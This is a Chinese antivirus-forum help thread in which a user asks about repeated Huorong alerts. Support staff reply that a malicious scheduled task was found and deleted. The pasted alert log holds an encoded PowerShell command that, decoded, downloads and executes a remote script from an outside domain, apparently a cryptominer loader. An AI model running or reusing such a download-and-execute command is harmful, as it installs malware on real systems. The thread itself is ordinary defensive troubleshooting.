火绒安全软件

动态防御问题反馈
发新帖
打印 上一主题 下一主题

[求助]svchost.exe触犯敏感动作防护规则

[复制链接]
5687 4
楼主
发表于 2019-12-22 01:04:48 | 只看该作者 |正序浏览 |阅读模式
跳转到指定楼层
操作进程:C:\WINDOWS\system32\svchost.exe
命令行:C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
父进程:C:\WINDOWS\system32\services.exe
防护项目:利用PowerShell执行可疑脚本
执行文件:C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell.exe -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGEAZABkAHIAZQBzAHMAbgBlAHQALgBkAG8ALgBhAG0ALwBlAGMALgB0AHgAdAAnACkAKQA=
操作结果:已阻止

基本一两个小时就会触发一次。但是全盘杀毒后无发现。看到论坛有类似的帖子说是挖矿病毒,要关闭远程端口。但我希望能找到病毒的文件,否则天天看到火绒有个红点提示也很烦。联系QQ:④18665127

回复

使用道具 举报

5687 4
5#
发表于 2019-12-27 16:12:28 | 只看该作者
baifengs 发表于 2019-12-26 23:28
好像很危险的样子啊。具体什么情况,怎么处理的。

您好,经远程查看,电脑存在计划任务,启动powershell脚本,火绒已拦截,删除该计划任务即可,您后期在使用火绒的过程中遇到问题,欢迎您联系我们,感谢您的反馈~
回复

使用道具 举报

5687 4
地板
发表于 2019-12-26 23:28:53 | 只看该作者
好像很危险的样子啊。具体什么情况,怎么处理的。
回复

使用道具 举报

5687 4
板凳
发表于 2019-12-23 10:35:53 | 只看该作者
您好,您所遇到的问题工程师已经远程帮您解决,感谢反馈哦~
回复

使用道具 举报

5687 4
沙发
发表于 2019-12-22 10:17:12 | 只看该作者
您好,已经添加您QQ啦,请您注意查收~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | [立即注册]

本版积分规则

快速回复 返回顶部 返回列表